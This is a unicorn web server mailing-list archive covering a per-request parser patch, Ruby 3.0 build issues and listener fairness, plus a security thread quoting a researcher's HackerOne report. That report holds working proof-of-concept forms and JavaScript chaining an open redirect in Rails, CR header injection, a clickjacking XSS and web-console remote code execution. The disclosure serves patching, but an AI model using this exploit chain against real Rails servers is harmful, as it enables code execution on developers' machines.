  2021-03-12 12:00  4%         ` Eric Wong
@ 2021-03-12 12:24  0%           ` Dirkjan Bussink
  0 siblings, 0 replies; 200+ results
From: Dirkjan Bussink @ 2021-03-12 12:24 UTC (permalink / raw)
  To: Eric Wong; +Cc: John Crepezzi, Kevin Sawicki, unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1404 bytes --]

Hi Eric,

> On 12 Mar 2021, at 13:00, Eric Wong <normalperson@yhbt.net> wrote:
> 
> I was going to say I didn't have a preference and the
> current approach was fine...
> 
> However, I just now realized now that clobbering+replacing all
> of @request is required.
> 
> That's because env['rack.input'] is (Stream|Tee)Input,
> and that is lazily consumed and those objects keep state in
> @request (as the historically-named @parser)
> 
> If we're to make env safe to be shipped off to another thread,
> then @request still needs to stick around to maintain state
> of env['rack.input'] until it's all consumed.


Ah yeah, that’s a good point. I don’t think this affects us right
now so the existing patch still keeps us safe, but it would break this
case then indeed.

> It probably doesn't affect most apps out there that just decode
> forms via HTTP POST; but the streamed rack.input is something
> that's critical for projects that feed unicorn with PUTs via
> "curl -T"

Ah yeah. So do you think that on top of the current patch we’d need
something like the attached patch (which moves the @request allocation),
or would only the latter patch be needed then?

In the latter case there’s still a bunch of logic for Rack hijack around
then which might not be needed at that point, but I’m not entirely sure
how that would look like.

Cheers,

Dirkjan


[-- Attachment #2: 0001-Allocate-a-new-request-for-each-client.patch --]
[-- Type: application/octet-stream, Size: 1579 bytes --]

From 58c4c153ba6c007284771c0899798a14df28c7c3 Mon Sep 17 00:00:00 2001
From: Dirkjan Bussink <d.bussink@gmail.com>
Date: Fri, 12 Mar 2021 13:22:25 +0100
Subject: [PATCH] Allocate a new request for each client

This removes the reuse of the parser between requests. Reusing these is
risky in the context of running any other threads within the unicorn
process, also for threads that run background tasks.

If any other thread accidentally grabs hold of the request it can modify
things for the next request in flight.

The downside here is that we allocate more for each request, but that is
worth the trade off here and the security risk we otherwise would carry
to leaking wrong and incorrect data.
---
 lib/unicorn/http_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index c0f14ba..22f067f 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -69,7 +69,6 @@ class Unicorn::HttpServer
   # incoming requests on the socket.
   def initialize(app, options = {})
     @app = app
-    @request = Unicorn::HttpRequest.new
     @reexec_pid = 0
     @default_middleware = true
     options = options.dup
@@ -621,6 +620,7 @@ def e100_response_write(client, env)
   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
   def process_client(client)
+    @request = Unicorn::HttpRequest.new
     env = @request.read(client)
 
     if early_hints
-- 
2.30.1


^ permalink raw reply related	[relevance 0%]

* Re: Potential Unicorn vulnerability
  @ 2021-03-12 12:00  4%         ` Eric Wong
  2021-03-12 12:24  0%           ` Dirkjan Bussink
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-03-12 12:00 UTC (permalink / raw)
  To: Dirkjan Bussink; +Cc: John Crepezzi, Kevin Sawicki, unicorn-public

Dirkjan Bussink <dbussink@github.com> wrote:
> Hi Eric,
> 
> > On 12 Mar 2021, at 10:41, Eric Wong <normalperson@yhbt.net> wrote:
> > 
> > I'm not in favor of new options since they add support costs
> > and increase the learning/maintenance curve.
> > 
> > What I've been thinking about is bumping the major version to 6.0
> > 
> > Although our internals are technically not supported stable API,
> > there may be odd stuff out there similar to OobGC that uses
> > instance_variable_get or similar things to reach into internals.
> > Added with the fact our internals haven't changed in many years;
> > I'm inclined to believe there are other OobGC-like things out
> > there that can break.
> > 
> > Also, with 6.0; users who completely avoid Threads can keep
> > using 5.x, while others can use 6.x
> 
> That sounds like a good plan then. Once there’s a new version we can
> bump that on our side to remove the manual patch then.

OK.  I think it's safe to wait a few days for more comments
before releasing in case there's more last-minute revelations
(see below :x)

> > Btw, did you consider replacing the @request HttpRequest object
> > entirely instead of the env and buf elements?
> > I suppose that's more allocations, still; but could've
> > been a smaller change.
> 
> Ah, that’s a very good point. I think that would also have been a valid
> approach but it does indeed add more allocations. If that approach would
> be preferred, I think it can also be changed to that?
> 
> I don’t really have a strong preference on which approach to take here,
> do you?

I was going to say I didn't have a preference and the
current approach was fine...

However, I just now realized now that clobbering+replacing all
of @request is required.

That's because env['rack.input'] is (Stream|Tee)Input,
and that is lazily consumed and those objects keep state in
@request (as the historically-named @parser)

If we're to make env safe to be shipped off to another thread,
then @request still needs to stick around to maintain state
of env['rack.input'] until it's all consumed.

It probably doesn't affect most apps out there that just decode
forms via HTTP POST; but the streamed rack.input is something
that's critical for projects that feed unicorn with PUTs via
"curl -T"

> > Oops, was that the integration tests in t/* ?
> 
> Nope, looks like some platform behavior changes (tried on MacOS first).
> I was able to get the tests running and working on Debian Buster this
> morning before I sent a new version of the patch and they are all passing
> there for me locally.

Ah, no idea about MacOS or any proprietary OS; I've never
considered them supported.  But yeah, it should work on any
GNU/Linux and Free-as-in-speech *BSDs

^ permalink raw reply	[relevance 4%]

* Re: [RFC] http_response: ignore invalid header response characters
  2021-01-28 22:39  5%         ` Eric Wong
@ 2021-02-17 21:46  0%           ` Sam Sanoop
  0 siblings, 0 replies; 200+ results
From: Sam Sanoop @ 2021-02-17 21:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Since no one is against this patch being applied, and its been a few
months since this discussion has been open. Can you look into this
soon Eric? thanks.


On Thu, Jan 28, 2021 at 10:39 PM Eric Wong <bofh@yhbt.net> wrote:
>
> Sam Sanoop <sams@snyk.io> wrote:
> > Hi Eric, did you get a chance to look at this? any thoughts on patching?
>
> Not yet; still stuck and behind on another project...
>
> Was hoping maybe somebody else paying attention to unicorn-public
> would chime in (no idea how many people read it between all
> the archives and HTTPS/IMAP/NNTP endpoints).
>
> Maybe I'll have a chunk of time this weekend...



-- 

Sam Sanoop
Security Analyst

^ permalink raw reply	[relevance 0%]

* Re: [RFC] http_response: ignore invalid header response characters
  @ 2021-01-28 22:39  5%         ` Eric Wong
  2021-02-17 21:46  0%           ` Sam Sanoop
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-01-28 22:39 UTC (permalink / raw)
  To: Sam Sanoop; +Cc: unicorn-public

Sam Sanoop <sams@snyk.io> wrote:
> Hi Eric, did you get a chance to look at this? any thoughts on patching?

Not yet; still stuck and behind on another project...

Was hoping maybe somebody else paying attention to unicorn-public
would chime in (no idea how many people read it between all
the archives and HTTPS/IMAP/NNTP endpoints).

Maybe I'll have a chunk of time this weekend...

^ permalink raw reply	[relevance 5%]

* Re: [RFC] http_response: ignore invalid header response characters
  @ 2021-01-13 23:20  3%   ` Sam Sanoop
    0 siblings, 1 reply; 200+ results
From: Sam Sanoop @ 2021-01-13 23:20 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Hi, The researcher didn’t test it with Ngnix, his configuration
according to the report was

server: unicorn (<= latest)
Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production


But reading http://blog.volema.com/nginx-insecurities.html, CRLF can
be allowed if a user is using $uri variables within their NGINX
config. So conditions within NGNIX would need to be met.

Regarding the hackerone report, here is a txt version of the report:


ooooooo_q-----------------

Hello,
I was looking at the change log
(https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2)
for CVE-2020-8185 and found another problem existed.

https://github.com/rails/rails/blob/v6.0.3.1/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb#L21

  redirect_to request.params[:location]
end

private
  def actionable_request?(request)
    request.show_exceptions? && request.post? && request.path == endpoint
  end

  def redirect_to(location)
    body = "<html><body>You are being <a
href=\"#{ERB::Util.unwrapped_html_escape(location)}\">redirected</a>.</body></html>"

    [302, {
      "Content-Type" => "text/html; charset=#{Response.default_charset}",
      "Content-Length" => body.bytesize.to_s,
      "Location" => location,
    }, [body]]
  end
There was an open redirect issue because the request parameter
location was not validated.
In 6.0.3.2, since the condition of actionable_request? has changed,
this problem is less likely to occur.

PoC
1. Prepare server
Prepare an attackable 6.0.3.1 version of Rails server

❯ rails -v
Rails 6.0.3.1

❯ RAILS_ENV=production rails s
...
* Environment: production
* Listening on tcp://0.0.0.0:3000
2. Attack server
Prepare the server for attack on another port.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=https://www.hackerone.com/">
    <button type="submit">click!</button>
</form>
python3 -m http.server 8000
3. Open browser
Open the http://localhost:8000/attack.html url in your browser and
click the button.
Redirect to https://www.hackerone.com/ url.



Impact
It will be fixed with 6.0.3.2 as with
CVE-2020-8185(https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0),
but I think it is necessary to announce it again because the range of
influence is different.

This open redirect changes from POST method to Get Method, so it may
be difficult to use for phishing.On the other hand, it may affect
bypass of referrer check or SSRF.



ooooooo_q------

I thought about it after submitting the report, but even in 6.0.3.2,
/rails/actions is available in developer mode.
If it was started in development mode, the request will be accepted by
CSRF, so the same as CVE-2020-8185 still exists.
I think it's better to take CSRF measures in /rails/actions.

Vulnerabilities, versions and modes
6.0.3.1 (production, development)
run pending migrations (CVE-2020-8185)
open redirect
6.0.3.2 (development)
run pending migrations (by CSRF)
open redirect (by CSRF)
6.0.3.2 (production)
no problem


tenderloveRuby on Rails staff -------

This seems like a good improvement, but I don't think we need to treat
it as a security issue. If you agree, would you mind filing an issue
on the Rails GitHub issues?
Thank you!


ooooooo_q------

@tenderlove
I'm sorry to reply late.

While researching unicorn, I found this report to lead to other vulnerabilities.

Open Redirect to HTTP header injection
Response header injection vulnerability exists in versions of puma below 4.3.2.
https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v
I have confirmed that unicorn is also enable of response header injection.

HTTP header injection is possible by including \r in the redirect URL
using these.

PoC
> escape("\rSet-cookie:a=a")
"%0DSet-cookie%3Aa%3Da"
This is the html used on the attack server.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0DSet-cookie%3Aa%3Da">
  <button type="submit">set cookie</button>
</form>
When click this button, the response header will be as follows.

Location:
Set-cookie: a=a
If you open the developer tools in your browser, you'll see that the
cookie value is set.

When I tried it, puma and unicorn can insert only the character of \r,
and it seems that \n cannot be inserted.
Therefore, it seems that response body injection that leads to XSS
cannot be performed.

On the other hand, in passenger, it became an error when \r was in the
value of the header.

XSS trick
While trying out \r on the response header, I noticed a strange thing.
If \r is at the beginning, it means that the browser is not redirected
and javascript: can be used in the URL of the response link.
When specify \rjavascript:alert(location) as the redirect destination,
the HTML of the response will be as follows.

<html><body>You are being <a href="
javascript:alert(location)">redirected</a>.</body></html>
The \r character is ignored in html, so javascript:alert(location) is
executed when the user clicks the link.

This is a separate issue from HTTP header injection and depends on how
the server handles the value of \r.
In puma and unicorn below 4.3.2, \r is used for HTTP header injection,
so no error occurs.
With puma 4.3.3 or later, if there is a line containing \r, it does
not become an error and it can be executed because that line is
excluded.
On the other hand, the error occurred in passenger.

As a further issue, the headers in this response are
middleware-specific and therefore do not include the security headers
Rails is outputting.
Since X-Frame-Options is not included, click jacking is possible.
No output even if CSP is set in the application.

By using click jacking in combination with these, it is easy to
generate XSS that requires user click.

PoC
Inserting the execution code from another site using the name of the iframe.

This PoC will also run in production mode if 6.0.0 < rails < 6.0.3.2.
It can be run with the latest puma and unicorn.

If it is development mode, it can be executed even after 6.0.3.2

child.html
<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aeval%28name%29">
    <button type="submit">location is escape("\rjavascript:eval(name)")</button>
</form>
<script type="text/javascript">
    document.querySelector("button").click();
</script>
click_jacking.html
<html>
<style>
iframe{
    position: absolute;
    z-index: 1;
    opacity: 0.3;
}
div{
    position: absolute;
    top: 20px;
    left: 130px;
}
button {
    width: 80px;
    height: 26px;
    cursor: pointer;
}
</style>
<body>
    <iframe src=./child.html name="alert(location)" height=40></iframe>
    <div>
        <button>click!!</button>
    </div>
</body>
</html>



XSS to RCE
When XSS exists in development mode, I confirmed that calling the
method of web-cosole leads to RCE.
RCE is possible by inducing users who are developing Rails
applications to click on the trap site.

PoC
var iframe = document.createElement("iframe");
iframe.src = "/not_found";
document.body.appendChild(iframe);
setTimeout(()=>fetch("/__web_console/repl_sessions/" +
iframe.contentDocument.querySelector("#console").dataset.sessionId, {
    method: "PUT",
    headers: {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    },
    body: JSON.stringify({
        input: "`touch from_web_console`"
    })
}), 2000)
<iframe src=./child.html name='var iframe =
document.createElement("iframe");iframe.src =
"/not_found";document.body.appendChild(iframe);setTimeout(()=>
fetch("/__web_console/repl_sessions/"+iframe.contentDocument.querySelector("#console").dataset.sessionId,
{method: "PUT",headers: {"Content-Type":
"application/json","X-Requested-With": "XMLHttpRequest"},body:
JSON.stringify({input: "`touch from_web_console`"})}),2000)'/>
When this is run, a file from from_web_console will be generated.

Vulnerabilities and conditions
Run pending migrations (CVE-2020-8185)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

Run pending migrations by CSRF
server: any

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

Open redirect (from POST method)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

HTTP header injection
server: unicorn (<= latest) or puma (< 4.3.2)

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

XSS (need user click)
server: unicorn (<= latest) or puma (<= latest)

Railse version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Railse version: 6.0.0 < (not fixed)
RAILS_ENV: development

RCE (from XSS)
server: unicorn (<= latest) or puma (<= latest)
Railse version: 6.0.0 < (not fixed)
RAILS_ENV: development



ooooooo_q------

When I tried it, puma and unicorn can insert only the character of \r,
and it seems that \n cannot be inserted.
Makes sense. This seems like a security vulnerability in Puma / Unicorn.
This is a separate issue from HTTP header injection and depends on how
the server handles the value of \r.
I'm not sure exactly which servers are vulnerable (this is too
confusing for me 😔), but whatever handles generating the response
page shouldn't allow \r at the beginning of the href like that.
So this needs to check that location is a url (http or https).
I don't think we need to set the security policy for the redirect page
if we prevent the javascript: location from the href.
How does this patch look?

On Wed, Jan 6, 2021 at 5:53 PM Eric Wong <bofh@yhbt.net> wrote:
>
> Sam Sanoop <sams@snyk.io> wrote:
> > Hi Eric,
>
> cf. https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> (private followup <CAEQPCYJJdriMQyDNXimCS_kBrc_=DxhxJ66YdJmCe7ZXr-Zbvg@mail.gmail.com>)
>
> Hi Sam, I'm moving this to the public list.  Please keep
> unicorn-public@yhbt.net Cc-ed (no need to quote, archives are
> public and mirrored to several places).
>
> > I wanted to bring this up again. I spoke with the researcher
> > (@ooooooo_q) who disclosed this issue to us. He released the full
> > details including the HackerOne report pubclily which provided more
> > clarity about this issue. That can be read here:
> > https://hackerone.com/reports/904059#activity-8945588
>
> Note: I can't read anything on hackerone due to the JavaScript
> requirement.  If somebody can copy the text here, that'd be
> great.
>
> > That report was initially disclosed to the Ruby on Rails maintainers.
> > In certain conditions, he was also able to leverage Puma and Unicorn
> > to exploit the issues mentioned on the report. The issues which
> > related to Unicorn were:
> >
> > * Open Redirect to HTTP header injection - (including \r in the redirect URL)
> > * A user interaction XSS  - Which leverages
> > \rjavascript:alert(location) as the redirect destination
>
> Does this happen when unicorn is behind nginx?
>
> unicorn was always designed to run behind nginx and falls over badly
> without it (trivially DoS-ed via slowloris)
>
> > Reading that advisory, I see this more of an issue now. He has
> > leveraged Unicorn and Puma along with Rails to demonstrate some of the
> > proof of concepts. Under the section Vulnerabilities and conditions of
> > the report, he has specified different conditions and configurations
> > which allow for this vector.
> >
> > I agree with Aaron Patterson's (Rails Staff) decision on that report,
> > this should be fixed in Unicorn and Puma directly, and Puma has
> > already fixed this and issued an advisory:
> > https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v.
> >
> > I believe there is enough of a risk to fix this issue. What do you think?
>
> While we follow puma on some things (as in recent non-rack
> features), I'm not sure if this affects unicorn the same way it
> affects puma and other servers (that are supported without nginx).
>
> Fwiw, I've been against client-side JavaScript for a decade, now.
> Libre license or not; the complexity of JS gives us a never-ending
> stream of vulnerabilities, wasted RAM, CPU cycles, and bandwidth
> use from constant software updates needed to continue the game of
> whack-a-mole.
>
> rest of thread below (top-posting corrected):
>
> > > On Sun, Jan 3, 2021 at 10:20 PM Eric Wong <bofh@yhbt.net> wrote:
> > > >
> > > > Sam Sanoop <sams@snyk.io> wrote:
> > > > > Hey Eric,
> > > > >
> > > > > Happy New Year. I want to follow up on the [RFC] http_response: ignore
> > > > > invalid header response character RFC for the CRLF injection we spoke
> > > > > about previously. I wanted to know what would be the timeline for your
> > > > > patch to get merged and what additional steps there are before that
> > > > > can happen.
> > > >
> > > > Hi Sam, honestly I have no idea if it's even necessary...
> > > > I've had no feedback since 2020-11-26:
> > > >   https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> > > >
> > > > Meanwhile 5.8.0 was released 2020-12-24 with a feature somebody
> > > > actually cared about.
> > > >
> > > > Again, unicorn falls over without nginx in front of it anyways,
> > > > so maybe nginx already guards against this and extra code is
> > > > unnecessary on my end.
> >
> > On Sun, Jan 3, 2021 at 11:03 PM Sam Sanoop <sams@snyk.io> wrote:
> > >
> > > Hey Eric,
> > >
> > > No problem, I understand. Since the injection here is happening within
> > > the response, I am not convinced if this is exploitable as well. I
> > > have let the reporter of this issue know what your stance is. I
> > > mentioned if he can provide a better Proof of Concept where this is
> > > exploitable in the context of a http request, and look into this a bit
> > > further, we can open up discussion again, or else, this is not worth
> > > fixing.



-- 

Sam Sanoop
Security Analyst

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-08  8:50  6%                           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-09-08  8:50 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > Ah, perhaps adding some checks to extconf.rb would be useful?
> > Or moving the ragel invocation into the extconf.rb-generated
> > Makefile? (not too sure how to do that...).
> 
> Not really no. And it would make ragel a build dependency.

No, the generated .c file would still be distributed with the
gem as it is today.  I'm absolutely against introducing new
build requirements (optional dependencies, maybe, but not
requirements).

Changing the .rl file might result in ragel running (or emit
warning if ragel isn't installed).  Not too sure how to do that
via mkmf, though...  Or it would just throw a warning and drop a
hint to run "make ragel" at the top-level if the .c file is
missing...

> But really I don't think so many people need to use unicorn
> branches.

*shrug*  I figure for any one person that posts a comment for
something on any public forum, there's probably 10 that feel the
same way.

> > OK, soon.  Maybe with just the aforementioned ragel check above;
> > or not even...  
> 
> I'd say not even. It's just for people like me trying to run branches.

Alright, we can experiment with more build system changes
another time another (and I zoned out while writing the 5.7
release notes and forgot to note the minor build system changes
I made right after th 5.6.0 release :x)

https://yhbt.net/unicorn-public/20200908084429.GA16521@dcvr/

^ permalink raw reply	[relevance 6%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  2020-09-03  8:29  0%           ` Jean Boussier
@ 2020-09-03  9:31  0%             ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2020-09-03  9:31 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> >> I'm trying to figure out why the symbol isn't exported,
> >> I might come back with another patch. But just in case
> >> you might have an idea what's going on.
> > 
> > I haven't built+tested ruby.git in ages (my computers are too slow).
> > It could be a failure to completely clean out the old 2.8 stuff
> > (either in the Ruby worktree, install paths, or unicorn worktree).
> 
> I don't think so, I'm building from a fresh docker image + fresh unicorn
> clone.
> 
> I also tested other similar gems (e.g. puma) and they export the functions
> just fine. 

Do the current dependencies (kgio, raindrops) export alright, as well?
Might be worth comparing the generated Makefile with other gems
and see if there's missing flags or such.

> I have to admit that I don't understand enough about the build process
> to figure out what's going on, so I'm not very confident I'll find a fix.

I'm not a build/linker expert, either.  Also, did things work a
few days/weeks ago when ruby.git was still 2.8?  Maybe mkmf.log
has clues, somewhere, too...

*shrug* my brain hurts from other stuff

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  2020-09-03  8:25  0%         ` Eric Wong
@ 2020-09-03  8:29  0%           ` Jean Boussier
  2020-09-03  9:31  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2020-09-03  8:29 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

>> That could work yes. Something akin to:
>> "This ruby version wasn't tested, blah blah".
> 
> OK, can you send a patch for that?

I will once I have something working on 3.0.

>> I'm trying to figure out why the symbol isn't exported,
>> I might come back with another patch. But just in case
>> you might have an idea what's going on.
> 
> I haven't built+tested ruby.git in ages (my computers are too slow).
> It could be a failure to completely clean out the old 2.8 stuff
> (either in the Ruby worktree, install paths, or unicorn worktree).

I don't think so, I'm building from a fresh docker image + fresh unicorn
clone.

I also tested other similar gems (e.g. puma) and they export the functions
just fine. 

I have to admit that I don't understand enough about the build process
to figure out what's going on, so I'm not very confident I'll find a fix.

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  2020-09-03  7:52  4%       ` Jean Boussier
@ 2020-09-03  8:25  0%         ` Eric Wong
  2020-09-03  8:29  0%           ` Jean Boussier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2020-09-03  8:25 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > Perhaps adding warnings about untested+unsupported
> > versions to test_helper.rb and extconf.rb is a better way to go?
> 
> That could work yes. Something akin to:
> "This ruby version wasn't tested, blah blah".

OK, can you send a patch for that?

> > Then, maybe leave the version check out of the gemspec entirely.
> 
> The gemspec ruby version is very useful but for minimum requirement
> only. e.g. `>= 1.9.3`.

Yes, I suppose; I was kinda interested in using 2.3+ socket
features (replacing kgio) but I might just use io_uring on
Linux, at least.

> > Fwiw, the type of breakage from incompatibilities I'm worried
> > about is subtle things that don't show up immediately
> > (e.g. encodings, hash ordering, frozen strings, etc...).
> 
> That's understandable, but 3.0 is not any more likely that 2.7
> to break any of these, and it's important that gems are testable on
> ruby pre-release, otherwise you end up with a chicken and egg
> problem of not being able to report compatibility breakages
> to ruby-core.

Agreed.

> On a totally different note, it seems that unicorn is not compiling
> quite properly against Ruby 3.0.0-dev, at least on linux:
> 
>    unicorn_http.so: undefined symbol: Init_unicorn_http
> 
> I'm trying to figure out why the symbol isn't exported,
> I might come back with another patch. But just in case
> you might have an idea what's going on.

I haven't built+tested ruby.git in ages (my computers are too slow).
It could be a failure to completely clean out the old 2.8 stuff
(either in the Ruby worktree, install paths, or unicorn worktree).

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-03  7:52  4%       ` Jean Boussier
  2020-09-03  8:25  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2020-09-03  7:52 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> Perhaps adding warnings about untested+unsupported
> versions to test_helper.rb and extconf.rb is a better way to go?

That could work yes. Something akin to:
"This ruby version wasn't tested, blah blah".

> Then, maybe leave the version check out of the gemspec entirely.

The gemspec ruby version is very useful but for minimum requirement
only. e.g. `>= 1.9.3`.

> Fwiw, the type of breakage from incompatibilities I'm worried
> about is subtle things that don't show up immediately
> (e.g. encodings, hash ordering, frozen strings, etc...).

That's understandable, but 3.0 is not any more likely that 2.7
to break any of these, and it's important that gems are testable on
ruby pre-release, otherwise you end up with a chicken and egg
problem of not being able to report compatibility breakages
to ruby-core.

On a totally different note, it seems that unicorn is not compiling
quite properly against Ruby 3.0.0-dev, at least on linux:

   unicorn_http.so: undefined symbol: Init_unicorn_http

I'm trying to figure out why the symbol isn't exported,
I might come back with another patch. But just in case
you might have an idea what's going on.

^ permalink raw reply	[relevance 4%]

* Re: Sustained queuing on one listener can block requests from other listeners
  2020-04-15  5:26  0% ` Eric Wong
@ 2020-04-16  5:46  0%   ` Stan Hu
  0 siblings, 0 replies; 200+ results
From: Stan Hu @ 2020-04-16  5:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks, Eric. That patch didn't work; it spun the CPU. I think this worked?

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index a52931a..aaa4955 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -708,7 +708,7 @@ def worker_loop(worker)
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
+      if nr == readers.size
         tmp = ready.dup
         redo
       end

On Tue, Apr 14, 2020 at 10:26 PM Eric Wong <e@yhbt.net> wrote:
>
> Stan Hu <stanhu@gmail.com> wrote:
> > My unicorn.rb has two listeners:
> >
> > listen "127.0.0.1:8080", :tcp_nopush => false
> > listen "/var/run/unicorn.socket", :backlog => 1024
>
> Fwiw, lowering :backlog may make sense if you got other
> hosts/instances.  More below..
>
> > We found that because of the greedy attempt to accept new connections
> > before calling select() in
> > https://github.com/defunkt/unicorn/blob/981f561a726bb4307d01e4a09a308edba8d69fe3/lib/unicorn/http_server.rb#L707-L714,
> > listeners on another socket stall out until the first listener is
> > drained. We would expect Unicorn to round-robin between the two
> > listeners, but that doesn't happen as long as there is work to be done
> > for the first listener. We've verified that deleting that `redo` block
> > fixes the problem.
> >
> > What do you think about the various options?
> >
> > 1. Only running that redo block if there is one listener
>
> That seems reasonable, or if ready.size == nr_listeners
> (proposed patch below)
>
> > 2. Removing the redo block entirely
>
> From what I recall ages ago, select() entry cost is pretty high
> and I remember that redo helping a fair bit even in 2009 with
> simple apps.  Syscall cost is even higher now with CPU
> vulnerability mitigations, and Ruby 1.9+ GVL release+reacquire
> is also a penalty I didn't have when developing this on 1.8.
>
> Do you have time+hardware to benchmark either approach on a
> simple app?  I no longer have stable/reliable hardware for
> benchmarking.  Thanks.
>
> Totally untested patch to try approach #1
>
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index a52931a..69f1f60 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -686,6 +686,7 @@ def worker_loop(worker)
>      trap(:USR1) { nr = -65536 }
>
>      ready = readers.dup
> +    nr_listeners = readers.size
>      @after_worker_ready.call(self, worker)
>
>      begin
> @@ -698,7 +699,6 @@ def worker_loop(worker)
>          # but that will return false
>          if client = sock.kgio_tryaccept
>            process_client(client)
> -          nr += 1
>            worker.tick = time_now.to_i
>          end
>          break if nr < 0
> @@ -708,7 +708,7 @@ def worker_loop(worker)
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0
> +      if ready.size == nr_listeners
>          tmp = ready.dup
>          redo
>        end
>
>
>
> And `nr' can probably just be a boolean `reopen' flag if we're
> not overloading it as a counter.

^ permalink raw reply related	[relevance 0%]

* Re: Sustained queuing on one listener can block requests from other listeners
  2020-04-15  5:06  4% Sustained queuing on one listener can block requests from other listeners Stan Hu
@ 2020-04-15  5:26  0% ` Eric Wong
  2020-04-16  5:46  0%   ` Stan Hu
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2020-04-15  5:26 UTC (permalink / raw)
  To: Stan Hu; +Cc: unicorn-public

Stan Hu <stanhu@gmail.com> wrote:
> My unicorn.rb has two listeners:
> 
> listen "127.0.0.1:8080", :tcp_nopush => false
> listen "/var/run/unicorn.socket", :backlog => 1024

Fwiw, lowering :backlog may make sense if you got other
hosts/instances.  More below..

> We found that because of the greedy attempt to accept new connections
> before calling select() in
> https://github.com/defunkt/unicorn/blob/981f561a726bb4307d01e4a09a308edba8d69fe3/lib/unicorn/http_server.rb#L707-L714,
> listeners on another socket stall out until the first listener is
> drained. We would expect Unicorn to round-robin between the two
> listeners, but that doesn't happen as long as there is work to be done
> for the first listener. We've verified that deleting that `redo` block
> fixes the problem.
> 
> What do you think about the various options?
> 
> 1. Only running that redo block if there is one listener

That seems reasonable, or if ready.size == nr_listeners
(proposed patch below)

> 2. Removing the redo block entirely

From what I recall ages ago, select() entry cost is pretty high
and I remember that redo helping a fair bit even in 2009 with
simple apps.  Syscall cost is even higher now with CPU
vulnerability mitigations, and Ruby 1.9+ GVL release+reacquire
is also a penalty I didn't have when developing this on 1.8.

Do you have time+hardware to benchmark either approach on a
simple app?  I no longer have stable/reliable hardware for
benchmarking.  Thanks.

Totally untested patch to try approach #1

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index a52931a..69f1f60 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -686,6 +686,7 @@ def worker_loop(worker)
     trap(:USR1) { nr = -65536 }
 
     ready = readers.dup
+    nr_listeners = readers.size
     @after_worker_ready.call(self, worker)
 
     begin
@@ -698,7 +699,6 @@ def worker_loop(worker)
         # but that will return false
         if client = sock.kgio_tryaccept
           process_client(client)
-          nr += 1
           worker.tick = time_now.to_i
         end
         break if nr < 0
@@ -708,7 +708,7 @@ def worker_loop(worker)
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
